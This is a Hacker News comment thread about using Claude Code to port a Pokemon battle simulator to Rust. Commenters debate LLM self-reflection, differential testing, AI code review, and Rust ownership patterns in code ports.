170 comments

  • thijser 3 days ago ago

    This reminds me of when I tried to let Claude port an Android libgdx-based game to a WASM-based libgdx version, so I could play the game in the browser.

    No matter how much I tried to force it to stick to a mostly line-by-line port, it kept trying to "improve" the code. At some point it had to undo everything as it introduced a number of bugs. I asked it: "What should I add to your prompt so you won't do this again?" and it gave me this:

      ### CRITICAL LESSON: Don't "Improve" During Porting
      -  **BIGGEST MISTAKE: Reorganizing working code**
        - **What I did wrong:** Tried to "simplify" by splitting `createStartButton()` into separate creation and layout methods
        - **Why it failed:** Introduced THREE bugs:
          1. Layout overlap (getY() vs getY() - getHeight())
          2. Children not sized (Group.setSize() doesn't affect children)
          3. Origins not updated (scaling animations broken)
        - **The fix:** Deleted my "improvements" and copied the original Android pattern faithfully
        - **Root cause:** Arrogance - assuming I could improve production-tested code without understanding all the constraints
        - **Solution:** **FOLLOW THE PORTING PRINCIPLES ABOVE** - copy first, don't reorganize
        - **Time wasted:** ~1 hour debugging self-inflicted bugs that wouldn't exist if I'd just copied the original
        - **Key insight:** The original Android code is correct and battle-tested. Your "improvements" are bugs waiting to happen.
    
    
    I like the self-reflection from Claude; unfortunately, even adding this to CLAUDE.md didn't fix it, and it kept taking wrong turns, so I had to abandon the effort.
    • phpnode 3 days ago ago

      Claude doesn't know why it acted the way it acted; it is only predicting why it acted. I see people falling for this trap all the time.

      • LoganDark 3 days ago ago

        It's not even predicting why it acted, it's predicting an explanation of why it acted, which is even worse since there's no consistent mental model.

      • GuB-42 2 days ago ago

        It has been shown that LLMs don't know how they work. Researchers asked an LLM to perform computations and explain how it got to the result. The LLM's explanation is typical of how we do it: add the numbers digit by digit, with carry, etc. But looking inside the neural network shows that the reality is completely different and much messier. None of this is surprising.

        Still, feeding it back its own completely made-up self-reflection could be an effective strategy; reasoning models kind of work like this.

        • phpnode 2 days ago ago

          The explanation becomes part of the context, which can lead to more effective results in the next turn. It does work, but it does so in a completely misleading way.

        • wongarsu 2 days ago ago

          Which should be expected, since the same is true for humans. The "adding numbers digit by digit with carry" works well on paper, but it's not an effective method for doing math in your head, and it's certainly not how I calculate 14+17. In fact I can't really tell you how I calculate 14+17, since that's not in the "inner monologue" part of my brain, and I have little introspection into any of the other parts.

          Still, feeding humans their completely made-up self-reflection back can be an effective strategy

          • GuB-42 2 days ago ago

            The difference is that if you are honest and pragmatic and someone asked you how you added two numbers, you would only say you did long addition if that's what you actually did. If you had no idea what you actually did, you would probably say something like "the answer came to me naturally".

            LLMs work differently. Like a human, 14+17=31 may come naturally, but when asked about their thought process, LLMs will not actually self-reflect; instead they will treat it like "in your training data, when someone is asked how they added numbers, what follows?", and usually that is long addition, so that is the answer you will get.

            It is the same reason LLMs hallucinate. They imitate what their dataset has to say, and their dataset doesn't have a lot of "I don't know" answers; an LLM that learned to answer "I don't know" to every question wouldn't be very useful anyway.

            • sigmoid10 2 days ago ago

              >if you are honest and pragmatic and someone asked you how you added two numbers, you would only say you did long addition if that's what you actually did. If you had no idea what you actually did, you would probably say something like "the answer came to me naturally".

              To me that misses the argument of the above comment. The key insight is that neither humans nor LLMs can express what actually happens inside their neural networks, but both have been taught to express e.g. addition using mathematical methods that can easily be verified. That still doesn't guarantee that either of them won't make mistakes; it only makes it reasonably possible for others to catch those mistakes. Always remember: all (mental) models are wrong, some models are useful.

          • estimator7292 2 days ago ago

            Life lesson for you: the internal functions of every individual's mind are unique. Your n=1 perspective is in no way representative of how humans as a category experience the world.

            Plenty of humans do use longhand arithmetic methods in their heads. There's an entire universe of mental arithmetic methods. I use a geometric process because my brain likes problems to fit into a spatial graph instead of an imaginary sheet of paper.

            Claiming you've not examined your own mental machinery is... concerning. Introspection is an important part of human psychological development. Like any machine, you will learn to use your brain better if you take a peek under the hood.

            • wongarsu 2 days ago ago

              > Claiming you've not examined your own mental machinery is... concerning

              The example was carefully chosen. I can introspect how I calculate 356*532, but I can't introspect how I calculate 14+17 or 1+3. I can work through 14+17 more deliberately, switching from "system 1" to "system 2" thinking (yes, I'm aware that that's a flawed theory), but that's not how I'd normally solve it. Similarly, I can describe to you how I count six eggs in a row, but I can't describe to you how I count three eggs in a row. Sure, I know I'm subitizing, but that's just putting a word on "I know how many are there without conscious effort". And without conscious effort I can't introspect it. I can switch to a process I can introspect, but that's not at all the same.

        • FireBeyond 2 days ago ago

          Right. Last time I checked this was easy to demonstrate with word logic problems:

          "Adam has two apples and Ben has four bananas. Cliff has two pieces of cardboard. How many pieces of fruit do they have?" (or slightly more complex, this would probably be easily solved, but you get my drift.)

          Change the wording to something entirely random, i.e. something not likely to be found in the LLM corpus, like walruses and skyscrapers and carbon molecules, and the LLM will give you a suitably nonsensical answer, showing that it is incapable of handling even simple substitutions that a middle schooler would recognize.

      • kaffekaka 3 days ago ago

        Yes, this pitfall is a hard one. It is very easy to read things into the LLM's output that there is no real basis for.

        • scotty79 2 days ago ago

          It must be anthropomorphization that's hard to shake off.

          If you understand how this all works, it's really no surprise that post-factum reasoning is exactly as hallucinated as the answer itself: it might have very little to do with the answer, and it never has anything to do with how the answer actually came to be.

          The value of "thinking" before giving an answer is reserving a scratchpad for the model to write some intermediate information down. There isn't any actual reasoning even there. The model might use the information it writes there in a completely obscure way (one that has nothing to do with what's verbally there) while generating the actual answer.

          • 2 days ago ago
            [deleted]
      • nnevatie 2 days ago ago

        That's because when the failure becomes the context, it can clearly express the intent of not falling for it again. However, when the original problem is the context, none of this obviousness applies.

        Very typical, and it gives LLMs that annoying Captain Hindsight-like behaviour.

      • nonethewiser 3 days ago ago

        IDK how far AIs are from intelligence, but they are close enough that there is no room for anthropomorphizing them. When they are anthropomorphized, it's assumed to be a misunderstanding of how they work.

        Whereas someone might say "geeze, my computer really hates me today" if it's slow to start, and we wouldn't feel the need to explain that the computer cannot actually feel hatred. We understand the analogy.

        I mean, your distinction is totally valid and I don't blame you for observing it, because I think there is a huge misunderstanding. But when I have the same thought, it often occurs to me that people aren't necessarily speaking literally.

        • amenhotep 3 days ago ago

          This is a sort of interesting point: it's true that knowingly metaphorical anthropomorphisation is hard to distinguish from genuine anthropomorphisation with these models, and that's food for thought, but the actual situation here just isn't an instance of it. This is a very specific misconception that people fall into all the time. The OP explicitly thought that the model would know why it did the wrong thing, or at least followed a strategy adjacent to that misunderstanding. He was surprised that adding extra slop to the prompt was no more effective than telling it what to do himself. It's not a figure of speech.

          • zarzavat 3 days ago ago

            A good time to quote our dear leader:

            > No one gets in trouble for saying that 2 + 2 is 5, or that people in Pittsburgh are ten feet tall. Such obviously false statements might be treated as jokes, or at worst as evidence of insanity, but they are not likely to make anyone mad. The statements that make people mad are the ones they worry might be believed. I suspect the statements that make people maddest are those they worry might be true.

            People are upset when AIs are anthropomorphized because they feel threatened by the idea that they might actually be intelligent.

            Hence the woefully insufficient descriptions of AIs such as "next token predictors" which are about as fitting as describing Terry Tao as an advanced gastrointestinal processor.

            • jdub 2 days ago ago

              I'm not threatened by the idea that LLMs might actually be intelligent. I know they're not.

              I'm threatened by other people wrongly believing that LLMs possess elements of intelligence that they simply do not.

              Anthropomorphosis of LLMs is easy, seductive, and wrong. And therefore dangerous.

            • antonvs 2 days ago ago

              The comment you replied to made a point that, if you accept it (which you probably should), makes that PG quote inapplicable here. The issue in this case is that treating the model as though it has useful insight into its own operation - which is being summarized as anthropomorphizing - leads to incorrect conclusions. It’s just a mistake, that’s all.

          • phpnode 3 days ago ago

            There's this underlying assumption of consistency too - people seem to easily grasp that when starting on a task the LLM could go in a completely unexpected direction, but when that direction has been set a lot of people expect the model to stay consistent. The confidence with which it answers questions plays tricks on the interlocutor.

          • nonethewiser 3 days ago ago

            What's not a figure of speech?

            I am speaking in general terms - not just about this conversation here. The only specific figure of speech I see in the original comment is "self reflection", which doesn't seem to be in question here.

          • electroglyph 2 days ago ago

            Some models are capable of metacognition. I've seen Anthropic's research replicated.

            • lukashahnart 2 days ago ago

              Can you elaborate on what you mean by metacognition and where you’ve seen it in Anthropic’s models?

      • drob518 2 days ago ago

        It's not even doing that. It's just an algorithm for predicting the next word. It doesn't have emotions or actually think. So I had to chuckle when it said it was arrogant. Basically, its training data contains a bunch of postmortem write-ups and it's using those as a template for what text to generate, telling us what we want to hear.

    • everfrustrated 3 days ago ago

      Worth pointing out that your IDE/plugin usually adds a whole bunch of prompts before yours - let alone the prompts that the model hosting provider prepends as well.

      This might be what encourages the agent to make "best practice" improvements. Looking at mine:

      >You are a highly sophisticated automated coding agent with expert-level knowledge across many different programming languages and frameworks and software engineering tasks - this encompasses debugging issues, implementing new features, restructuring code, and providing code explanations, among other engineering activities.

      I could imagine that an LLM could well interpret that to mean it should improve things as it goes. Models (like humans) don't respond well to instructions in the negative (don't think about pink monkeys - now we're both thinking about them).

      • hombre_fatal 3 days ago ago

        It's also common for your own CLAUDE.md to have some generic line like "Always use best practices and good software design" that gets in the way of other prompts.

    • theLiminator 2 days ago ago

      For anything large like this, I think it's critical that you port over the tests first, and then essentially force it to get the tests passing without mutating the tests. This works nicely for stuff that's very purely functional; it's a lot harder with a GUI app though.
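
      As a rough sketch of the "tests as contract" idea in Rust (the function and fixture names here are hypothetical, not from the article or this thread):

        // The reference suite's inputs/outputs are captured as fixtures, and the
        // port only counts as done when it reproduces them unchanged.
        // `simulate_turn` stands in for whatever the ported API ends up being.
        fn simulate_turn(input: &str) -> String {
            input.to_uppercase() // placeholder implementation
        }

        #[cfg(test)]
        mod tests {
            use super::*;

            #[test]
            fn matches_reference_fixtures() {
                // (input, expected output recorded from the original implementation)
                let fixtures = [("tackle", "TACKLE"), ("growl", "GROWL")];
                for (input, expected) in fixtures {
                    assert_eq!(simulate_turn(input), expected);
                }
            }
        }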

      • pwdisswordfishy 2 days ago ago

        The same insight can be applied to the codebase itself.

        When you're porting the tests, you're not actually working on the app. You're getting it to work on some other adjacent, highly useful thing that supports app development, but nonetheless is not the app.

        Rather than trying to get the language model to output constructs in the target PL/ecosystem that go against its training, get it to write a source code processor that you can then run on the original codebase to mechanically translate it into the target PL.

        Not only does this work around the problem where you can't manage to convince the fuzzy machine to reliably follow a mechanical process, it sidesteps problems around the question of authorship. If a binary that has been mechanically translated from source into executable by a conventional compiler inherits the same rightsholder/IP status as the source code that it was mechanically translated from, then a mechanical translation by a source-to-source compiler shouldn't be any different, no matter what the model was trained on. Worst case scenario, you have to concede that your source processor belongs to the public domain (or unknowingly infringed someone else's IP), but you should still be able to keep both versions of your codebase, one in each language.
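
        As a deliberately toy sketch of the shape of such a processor (a real source-to-source translator would parse to an AST rather than do string rewrites, and the rewrite rules and file names here are purely illustrative):

          use std::fs;

          // Toy mechanical translator: apply dumb, reviewable rewrite rules to the
          // original source. This only illustrates the "deterministic pass" idea;
          // the output of these particular rules would still need real work.
          fn translate(js: &str) -> String {
              js.replace("console.log(", "println!(")
                  .replace("===", "==")
                  .replace("!==", "!=")
          }

          fn main() -> std::io::Result<()> {
              let src = fs::read_to_string("battle.js")?; // hypothetical input file
              fs::write("battle.draft.rs", translate(&src))?;
              Ok(())
          }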

    • wyldfire 3 days ago ago

      One thing that might be effective at limited-interaction recovery from ignoring CLAUDE.md is the code-review plugin [1], which spawns agents that check that the changes conform to rules specified in CLAUDE.md.

      [1] https://github.com/anthropics/claude-code/blob/main/plugins/...

    • surajrmal 2 days ago ago

      I recently did a C++ to Rust port with Gemini and it was basically a straight-line port like I wanted. Nearly 10k lines of code, too. It needed to change a bit of structure to get it compiling, but that's only because Rust found bugs at compile time. I attribute this success to the fact that my team writes C++ stylistically close to idiomatic Rust, and that the languages are generally quite similar. I will likely do another pass in the future to turn the callback-driven async into async/await syntax, but off the bat it largely avoided doing so when it would change code structure.

    • arjie 2 days ago ago

      It's not context-free (haha), but a trick you can try is to include negative examples in the prompt. It used to be an awful trick originally because of the Waluigi Effect, but it has since become a good one, and lately with Opus 4.5 I haven't needed it that much. But it did work once: e.g. take the original code and supply the correct answer and the wrong answers as examples in CLAUDE.md, then redo.

      If it works, do share.

    • pwdisswordfishy 2 days ago ago

      Humans act the same way.

      For all the (unfortunately necessary) conversations that have occurred over the years of the form, "JavaScript is not Java—they're two different languages," people sometimes go too far and tack on some remark like, "They're not even close to being alike." The reality, though, is that many times you can take some in-house package (though not the Enterprise-hardened™ ones with six different overloads for every constructor, and four for every method, and that buy hard into Java (or .NET) platform peculiarities—just the ones where someone wrote just enough code to make the thing work in that late-90's OOP style associated with Java), and more or less do a line-by-line port until you end up with a native JS version of the same program, which with a little more work will be able to run in browser/Node/GraalJS/GJS/QuickJS/etc. Generally, you can get halfway there by just erasing the types and changing the class/method declarations to conform to the different syntax.

      Even so, there's something that happens in folks' brains that causes them to become deranged and stray far off-course. They never just take their program, where they've already decomposed the solution to a given problem into parts (that have already been written!), and then just write it out again—same components, same identifier names, same class structure. There's evidently some compulsion where, because they sense the absence of guardrails from the original language, they just go absolutely wild, turning out code that no one would or should want to read—especially not other programmers hailing from the same milieu who explicitly, avowedly, and loudly state their distaste for "JS" (whereby they mean "the kind of code that's pervasive on GitHub and NPM" and is so hated exactly because it's written in the style their coworker, who has otherwise outwardly appeared to be sane up to this point, just dropped on the team).

    • andai 2 days ago ago

      Was this Claude Code? If you tried it with one file at a time in the chat UI I think you would get a straight-line port, no?

      Edit: It could be because Rust works a little differently from other languages; a 1:1 port is not always possible or idiomatic. I haven't done much with Rust, but whenever I try porting something to Rust with LLMs, it imports like 20 cargo crates first (even when there were no dependencies in the original language).

      Also, Rust for gamedev was a painful experience for me, because Rust hates globals (and has nanny totalitarianism, so there's no way to tell it "actually I am an adult, let me do the thing"), so you have to do weird workarounds for it. GPT started telling me some insane things like, oh it's simple, you just need this Rube Goldberg machine of macro crates. I thought it was tripping balls until I joined a Rust Discord and got the same advice. I just switched back to TS and redid the whole thing on the last day of the jam.

      • zozbot234 2 days ago ago

        > rust hates globals

        Rust recently added OnceCell and OnceLock (the latter is the thread-safe one) to make globals a lot easier for some things. It's not "hate"; it just wants you to be consistent about what you're doing.
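
        For example, a lazily initialized, thread-safe global is now just this (a minimal sketch; the Config struct is made up):

          use std::sync::OnceLock;

          struct Config {
              max_turns: u32,
          }

          // Thread-safe global: initialized exactly once, readable from anywhere.
          static CONFIG: OnceLock<Config> = OnceLock::new();

          fn config() -> &'static Config {
              CONFIG.get_or_init(|| Config { max_turns: 1000 })
          }

          fn main() {
              println!("max turns = {}", config().max_turns);
          }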

    • antonvs 2 days ago ago

      That’s a terrible prompt, more focused on flagellating itself for getting things wrong than actually documenting and instructing what’s needed in future sessions. Not surprising it doesn’t help.

    • abyesilyurt 2 days ago ago

      Sonnet 4.5 had this problem. Opus 4.5 is much better at focusing on the task instead of getting sidetracked.

    • 0x696C6961 3 days ago ago

      I wish there was a feature to say "you must re-read X" after each compaction.

      • nickreese 3 days ago ago

        Some people use hooks for that. I just avoid CC and use Codex.

      • taberiand 2 days ago ago

        Getting the context full to the point of compaction probably means you're already dealing with a severely degraded model; the more effective approach is to work in chunks that don't come close to filling the context window.

      • philipp-gayret 3 days ago ago

        There's no PostCompact hook, unfortunately. You could try PreCompact and give back a message saying it's super duper important to re-read X, and hope that survives the compacting.

      • root_axis 3 days ago ago

        What would it even mean to "re-read after a compaction"?

        • esafak 2 days ago ago

          To enter a file into the context after losing it through compaction.

    • andai 2 days ago ago

      Tangential but doesn't libgdx have native web support?

    • esafak 2 days ago ago

      It doesn't seem very bound by CLAUDE.md

    • badlogic 2 days ago ago

      libGDX, now that's a name I haven't heard in a while.

    • Lionga 3 days ago ago

      Well, it's close to AGI; can you really expect AGI to follow simple instructions from dumbos like you when it can do the work of god?

      • b00ty4breakfast 3 days ago ago

        As an old coworker once said when talking about a certain manager: that boy's just smart enough to be dumb as shit. (The AI, not you; I don't know you well enough to call you dumb.)

  • danesparza 3 days ago ago

    Some quotes from the article stand out: "Claude after working for some time seem to always stop to recap things". Question: were you running out of context? That's why techniques like intentional compaction are being worked on. Large codebases have specific needs when working with an LLM.

    "I've never interacted with Rust in my life"

    :-/

    How is this a good idea? How can I trust the generated code?

    • johnfn 3 days ago ago

      The author says that he runs both the reference implementation and the new Rust implementation through 2 million (!) randomly generated battles and flags every battle where the results don't line up.
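
      The harness for that is conceptually simple; roughly something like this (a sketch with stubbed-out functions, not the author's actual code):

        // Differential testing sketch: run the same seeded battle through the
        // reference engine and the port, and flag every battle whose logs diverge.
        // The two functions below are stand-ins for the real calls (e.g. shelling
        // out to the original JS simulator vs. calling into the Rust port).
        fn reference_battle(seed: u64) -> String {
            format!("battle-log-{seed}") // stub
        }

        fn ported_battle(seed: u64) -> String {
            format!("battle-log-{seed}") // stub
        }

        fn main() {
            let total = 2_000_000u64;
            let mut mismatches = Vec::new();
            for seed in 0..total {
                if reference_battle(seed) != ported_battle(seed) {
                    mismatches.push(seed);
                }
            }
            println!("{} / {} battles diverged", mismatches.len(), total);
        }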

      • simonw 3 days ago ago

        This is the key to the whole thing in my opinion.

        If you ask a coding agent to port code from one language to another and don't have a robust mechanism to test that the results are equivalent, you're inevitably going to waste a lot of time and money on junk code that doesn't work.

        • storystarling 2 days ago ago

          Fuzzing handles the logic verification, but I'd be more worried about the architectural debt of mapping GC patterns to Rust. You often end up with a mess of Arc/Mutex wrappers and cloning just to satisfy the borrow checker, which defeats the purpose of the port.

          • zozbot234 2 days ago ago

            That will vary depending on how the code is architected to begin with, and the problem domain. Single-ownership patterns can be refactored into Rust ownership, and a good AI model might be able to spot them even when not explicitly marked in the code.

            For some problems dealing with complex general graphs, you may even find it best to use a Rust-based general GC solution, especially if it can be based on fast concurrent GC.
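
            For illustration, the two styles side by side (a toy sketch, not taken from the actual port):

              use std::cell::RefCell;
              use std::rc::Rc;

              // GC-mimicking style: shared, interiorly mutable handles everywhere.
              struct SharedMon {
                  hp: RefCell<i32>,
              }

              // Ownership style: the battle owns its sides, the sides own their
              // pokemon, and mutation goes through &mut borrows instead of handles.
              struct Pokemon { hp: i32 }
              struct Side { team: Vec<Pokemon> }
              struct Battle { sides: [Side; 2] }

              impl Battle {
                  fn damage(&mut self, side: usize, slot: usize, amount: i32) {
                      self.sides[side].team[slot].hp -= amount;
                  }
              }

              fn main() {
                  // Shared-handle version: compiles, but every access is checked at runtime.
                  let mon = Rc::new(SharedMon { hp: RefCell::new(100) });
                  *mon.hp.borrow_mut() -= 40;

                  // Single-ownership version: the same mutation, checked at compile time.
                  let mut battle = Battle {
                      sides: [
                          Side { team: vec![Pokemon { hp: 100 }] },
                          Side { team: vec![Pokemon { hp: 100 }] },
                      ],
                  };
                  battle.damage(0, 0, 40);
                  println!("{} vs {}", mon.hp.borrow(), battle.sides[0].team[0].hp);
              }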

      • Herring 3 days ago ago

        Yeah and he claims a pass rate of 99.96%. At that point you might be running into bugs in the original implementation.

        • sanxiyn 2 days ago ago

          Not really. Due to combinatorial explosion, some paths are hard to hit randomly in this kind of source code. I would have preferred 99% code coverage of the reference implementation after 2M random battles over a 99% pass rate.

          I don't know anything about Pokemon, but I briefly looked at the code. "weather" seemed like a self contained thing I could potentially understand. Looking at https://github.com/vjeux/pokemon-showdown-rs/blob/master/src...

          > NOTE: ignoringAbility() and abilityState.ending not fully implemented

          So it is almost certain that even with a 99.96% pass rate, it never hit a battle with a weather-suppressing Pokemon whose ability was being ignored. A code-coverage-driven testing loop would have found and fixed this one easily.

          • Herring 2 days ago ago

            Good catch. I should really look at the code before commenting on it.

    • Palomides 3 days ago ago

      I'm very skeptical, but this is also something that's easy to compare using the original as a reference implementation, right? Providing lots of random input and fixing any disparities is a classic approach for rewriting/porting a system.

      • ethin 3 days ago ago

        This only works up to a certain point. Given that the author openly admits they don't know/understand Rust, there is a really high likelihood that the LLM made all kinds of mistakes a Rust developer would have avoided, and the dev is going to be left flailing about trying to understand why they happen/what's causing them/etc. A hand rewrite would've actually taught the author a lot of very useful things, I'm guessing.

        • galangalalgol 3 days ago ago

          It seems like they have something like differential fuzzing to guarantee identical behavior to the original, but they still are left with a codebase they cannot read...

    • rkozik1989 3 days ago ago

      Hopefully they have a test suite written by QA; otherwise they're for sure going to have a buggy mess on their hands. People need to learn that if you must rewrite something (often you don't actually need to), an incremental approach is best.

      • yieldcrv 3 days ago ago

        1 month of Claude Code would be an incremental approach

        It would honestly try to one-shot the whole conversion in a 30 minute autonomous session

      • jamesfinlayson 2 days ago ago

        > often you don't actually need to

        Feels like this one is always a mistake that needs to be made for the lesson to be learned.

        • port11 2 days ago ago

          At this point it seems pretty clear that all projects ported from Ruby to Python, then Python to Typescript, must now be ported to Rust. It will solve almost all problems of the tech industry…

    • captbaritone 3 days ago ago

      His goal was to get a faster oracle that encoded the behavior of Pokemon that he could use for a different training project. So this project provides that without needing to be maintainable or understandable itself.

      • topaz0 2 days ago ago

        Back of the envelope, they'll need to run this on the order of a billion times to break even, under the (laughable) assumption that running Claude Code uses compute comparable to the computer he's running his code on. So more like hundreds of billions or trillions of runs, I'd guess.

    • ferguess_k 3 days ago ago

      I think it could work if they have tests with good coverage, like the "test farm" described by someone who worked at Oracle.

    • atonse 3 days ago ago

      My answer to this is often to get the LLMs to do multiple rounds of code review (depending on the criticality of the code, doing reviews on every commit - but this was clearly a zero-impact hobby project).

      They are remarkably good at catching things, especially if you do it every commit.

      • usrbinbash 3 days ago ago

        > My answer to this is to often get the LLMs to do multiple rounds of code review

        So I am supposed to trust the machine, that I know I cannot trust to write the initial code correctly, to somehow do the review correctly? Possibly multiple times? Without making NEW mistakes in the review process?

        Sorry no sorry, but that sounds like trying to clean a dirty floor by rubbing more dirt over it.

        • atonse 3 days ago ago

          It sounds to me like you may not have used a lot of these tools yet, because your response sounds like pushback around theoreticals.

          Please try the tools (especially either Claude Code with Opus 4.5, or OpenAI Codex 5.2). Not at all saying they're perfect, but they are much better than you currently think they might be (judging by your statements).

          AI code reviews are already quite good, and are only going to get better.

          • gixco 2 days ago ago

            Why is the go-to always "you must not have used it" in lieu of the much more likely experience of having already seen and rejected first-hand the slop that it churns out? Synthetic benchmarks can rise all they want; Opus 4.5 is still completely useless at all but the most trivial F# code and, in more mainstream affairs, continues to choke even on basic ASP.NET Core configuration.

            • atonse 2 days ago ago

              About a year ago they sucked at writing elixir code.

              Now I use them to write nearly 100% of my elixir code.

              My point isn’t a static “you haven’t tried them”. My point is, “try them every 2-3 months and watch the improvements, otherwise your info is outdated”

          • usrbinbash 2 days ago ago

            > It sounds to me like you may not have used a lot of these tools yet

            And this is more and more becoming the default answer I get whenever I point out obvious flaws of LLM coding tools.

            Did it occur to you that I know these flaws precisely because I work a lot with, and evaluate the performance of, LLM based coding tools? Also, we're almost 4y into the alleged "AI Boom" now. It's pretty safe to assume that almost everyone in a development capacity has spent at least some effort evaluating how these tools do. At this point, stating "you're using it wrong" is like assuming that people in 2010 didn't know which way to hold a smartphone.

            Sorry no sorry, but when every criticism of a tool elicits the response that people are not using it well, then maybe, just maybe, the flaw is not with all those people, but with the tool itself.

            • atonse 2 days ago ago

              Spending 4 years evaluating something that’s changing every month means almost nothing, sorry.

              Almost every post exalting these models’ capabilities talks about how good they’ve gotten since November 2025. That’s barely 90 days ago.

              So it’s not about “you’re doing it wrong”. It’s about “if you last tried it more than 3 months ago, your information is already outdated”

              • usrbinbash 2 days ago ago

                > Spending 4 years evaluating something that’s changing every month means almost nothing, sorry.

                No need to be sorry. Because, if we accept that premise, you just countered your own argument.

                If me evaluating these things for the past 4 years "means almost nothing" because they are changing sooo rapidly... then by the same logic, any experience with them also "means almost nothing". If the timeframe before experience with these models becomes irrelevant is as short as 90 days, then there is barely any difference between someone with experience and someone just starting out.

                Meaning, under that premise, as long as I know how to code, I can evaluate these models, no matter how little I use them.

                Luckily for me though, that's not the case anyway because...

                > It’s about “if you last tried it more than 3 months ago,

                ...guess what: I try these almost every week. It's part of my job to do so.

        • pluralmonad 3 days ago ago

          Implementation -> review cycles are very useful when iterating with CC. The point of the agent reviewer is not to take the place of your personal review, but to catch any low hanging fruit before you spend your valuable time reviewing.

          • usrbinbash 2 days ago ago

            > but to catch any low hanging fruit before you spend your valuable time reviewing.

            And that would be great, if it weren't for the fact that I also have to review the reviewer's review. So even for the "low hanging fruit", I need to double-check everything it does.

            Which kinda eliminates the time savings.

            • pluralmonad 2 days ago ago

              That is not my perspective. I don't review every review; instead I use a review agent with fresh context to find as much as possible. After all automated reviews pass, I then review the final output diff. It saves a lot of back and forth, especially with a tight prompt for the review agent. Give the reviewer specific things to check and you won't see nearly as much garbage in your review.

        • hombre_fatal 3 days ago ago

          Well, you can review its reasoning. And you can passively learn enough about, say, Rust to know if it's making a good point or not.

          Or you will be challenged to define your own epistemic standard: what would it take for you to know if someone is making a good point or not?

          For things you don't understand enough to review as comfortably, you can look for converging lines of conclusions across multiple reviews and then evaluate the diff between them.

          I've used Claude Code a lot to help translate English to Spanish as a hobby. Not being a native Spanish speaker myself, there are cases where I don't know the nuances between two different options that otherwise seem equivalent.

          Maybe I'll ask 2-3 Claude Code instances to compare the difference between two options in context and pitch me a recommendation, and I can drill down into their claims infinitely.

          At no point do I need to go "ok I'll blindly trust this answer".

        • ctoth 3 days ago ago

          Wait until you start working with us imperfect humans!

          • Ronsenshi 3 days ago ago

            Humans do at least have the capacity for deductive reasoning and understanding, which helps. LLMs do not. So would you trust somebody who can reason, or somebody who can only guess?

            • galangalalgol 3 days ago ago

              People work differently than LLMs; they find things we don't, and the reverse is also obviously true. As an example, a stack use-after-free was found in a large monolithic C++98 codebase at my megacorp. None of the static analyzers caught it; even after modernizing it and getting clang-tidy's modernize checks to pass, nothing found it. ASan would have found it if a unit test had covered that branch. As a human I found it, but mostly because I knew there was a problem to find. An LLM found and explained the bug succinctly. Having an LLM be a reviewer for merge requests makes a ton of sense.

    • 2 days ago ago
      [deleted]
    • rvz 3 days ago ago

      > How is this a good idea? How can I trust the generated code?

      You don't. The LLM wrote the code and is absolutely right. /s

      What could possibly go wrong?

    • eddythompson80 3 days ago ago

      Same way you trust any auto translation for a document. You wrote it in English (or whatever language you’re most proficient in), but someone wants it in Thai or Czech, so you click a button and send them the document. It’s their problem now.

  • hedgehog 3 days ago ago

    I ported a closed source web conferencing tool to Rust over about a week with a few hours of actual attention and keyboard time. From 2.8MB of minified JS hosted in a browser to a 35MB ARM executable that embeds its own audio, WebRTC, graphics, embedded browser, etc. Also a mdbook spec to explain the protocol, client UI, etc. Zero lines of code by me. The steering work did require understanding the overall work to be done, some high level design of threading and buffering strategy, what audio processing to do, how to do sprite graphics on GPU, some time in a profiler to understand actual CPU time and memory allocations, etc. There is no way I could have done this by hand in a comparable amount of time, and given the clearly IP-encumbered nature I wouldn't spend the time to do it except that it was easy enough and allowed me to then fix two annoying usability bugs with the original.

    • written-beyond 3 days ago ago

      Please give us a write up

      • hedgehog 2 days ago ago

        I don't have time right now for a proper write-up but the basic points in the process were:

        1. Write a document that describes the work. In this case I had the minified+bundled JS, no documentation, but I did know how I use the system and generally the important behavioral aspects of the web client. There are aspects of the system that I know from experience tend to be tricky, like compositing an embedded browser into other UI, or dealing with VOIP in general. Other aspects, like JS itself, I don't really know deeply. I knew I wanted a Mac .app out the end, as well as Flatpak for Linux. I knew I wanted an mdbook of the protocol and behavioral specs. Do the best you can. Think really hard about how to segment the work for hands-off testability so the assistant can grind the loop of add logs, test run, fix, etc.

        2. In Claude Desktop (or whatever) paste in the text from 1 and instruct it to research and ask you batches of 10 clarifying questions until it has enough information to write a work plan for how to do the job, specific tools, necessary documentation, etc. Then read and critique until you feel like the thread has the elements of a good plan, and have Claude generate a .md of the plan.

        3. Create a repo containing the JS file and the plan.

        4. Add other tools like my preferred template for change implementation plans, Rust style guide, etc (have the chatbot write a language style guide for any language you use that covers the gap between common practice ~3 years ago and the specific version of the language you want to use, common errors, etc). I have specific instructions for tracking current work, work log, and key points to remember in files, everyone seems to do this differently.

        5. Add Claude Code (or whatever) to the container or machine holding the repo.

        Repeat until done:

        6a. Instruct the assistant to do a time-boxed 60 minutes of work towards the goal, or until blocked on questions, then leave changes for your review along with any questions.

        6b. Instruct the assistant to review changes from HEAD for correctness, completeness, and opportunities to simplify, leaving questions in chat.

        6c. Review and give feedback / make changes as necessary. Repeat 6b until satisfied.

        6d. Go back to 6a.

        At various points you'll find that the job is mis-specified in some important way, or the assistant can't figure out what to do (e.g. if you have choppy audio due to a buffer bug, or a slow memory leak, it won't necessarily know about it). Sometimes you need to add guidance to the instructions like "update instructions to emphasize that we must never allocate in situation XYZ". Sometimes the repo will start to go off the rails and get messy, which can be improved with instructions like "consider how to best organize this repository for ease of onboarding the next engineer, describe in chat your recommendations" and then having it do what it recommended.

        There's a fair amount of hand-holding but a lot of it is just making sure what it's doing doesn't look crazy and pressing OK.

        • written-beyond 14 hours ago ago

          Oh no, I didn't mean a write-up about the prompting, I meant about the actual client you wrote.

          What was the final framework like, how did the protocols work, etc.

          • hedgehog 11 hours ago ago

            Oh, there's a centrally hosted web server that hosts the assets, some of the conference state, account info, that sort of thing. Clients join an SSE channel for notifications of events relating to other clients. Then there's a combination of POST to the web service plus ICE and STUN to establish all-to-all RTP over WebRTC for audio, and other client state updates go as JSON over a WebRTC data channel. The UI is very specific to the app but built on winit, webgpu, and egui, with wry for the embedded browser.

  • frabonacci 2 days ago ago

    The author's differential testing (2.3M random battles) is great as final validation, but the real lesson here is that modular testing should happen during the port, not after.

    1. Port tests first - they become your contract
    2. Run unit tests per module before moving on - catches issues like the "two different move structures" early
    3. Integration tests at boundaries before proceeding
    4. E2e/differential testing as final validation

    When you can't read the target language, your test suite is your only reliable feedback. The integration issues that ate up debugging time would've been caught earlier with progressive testing.

    • cryptonector 2 days ago ago

      The real lesson... I mean, if all of this took 1 month, the TFA already did amazingly well. Next time they'll do even better, no doubt.

  • umvi 3 days ago ago

    I've seen stuff like this go the opposite direction with researchers (who generally aren't software engineers):

